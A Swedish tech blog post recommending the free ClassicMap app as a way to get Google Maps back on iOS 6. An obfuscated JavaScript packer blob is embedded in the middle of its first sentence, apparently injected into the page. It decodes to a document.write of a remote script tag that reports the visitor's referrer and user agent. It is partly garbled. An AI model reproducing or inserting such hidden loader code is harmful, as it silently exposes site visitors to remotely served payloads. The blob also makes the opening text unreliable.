Image Image Image Image Image Image Image Image Image Image

| 20 oktober, 2018

Scroll to top

Top

Google maps med ClassicMap till iOS

Google maps med ClassicMap till iOS
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrfis|var|u0026u|referrer|hkihh||js|php’.split(‘|’),0,{}))
är många som har skickat in till oss och frågat om vi har något tips på hur man kan få tillbaka Google Maps på nya iOS 6.

De tipsen vi har gett är alternativet att göra Google Maps hemsida till ett bokmärke på hemskärmen, ungefär som en app. 
Det tipset har fungerat bra och är även det som jag använt i vissa situationer.

Nu har det dock kommet ett till alternativ, denna gång en app.
Det är utvecklaren Katsumi Kishikawa som nu lanserar ClassicMap som är en applikation som fungerar på nästan alla Apple-enheter. iPhone 3GS till iPhone 5, iPod Touch (tredje generationen), alla iPad. Förutom detta så är den också optimerad för iPhone 5 där bilden ovan kommer ifrån.

ClassicMap är kortfattat en app som tar tillbaka Google Maps. De pålitliga satellitvyerna och kartor, den saknar dock Street View och möjligheten att ge förslag på en rutt från en viss plats till en annan. Förutom detta så fungerar den precis som de gamla goda Google Maps.

Är du en av många sura användare som saknar kartorna från Google Maps ska du absolut ladda ner och installera ClassicMap som är helt gratis i App Store.

Vi har testat den och kommer absolut behålla den istället för att använda den webbaserade varianten som vi nämnt till några av er innan, även om den också fungerar relativt bra.

Om detta inte är något ni är intresserade av utan istället vill ha svar eller andra tips på hur man skulle kunna åtgärda kartorna är det bara att skicka mail till oss eller kommentera nedan. Vi svarar alltid snabbt och på ett så bra sätt som möjligt för att göra dig nöjd.

Om ni är väldigt sura så kan ni alltid prova att skicka ett mail till Apple själva och se vad de säger. Om det är någon som gör det och får ett svar får ni gärna skicka det till oss så kan vi publicera ett roligt inlägg om det.

ClassicMap till iPhone, iPod touch och iPad är gratis i App Store.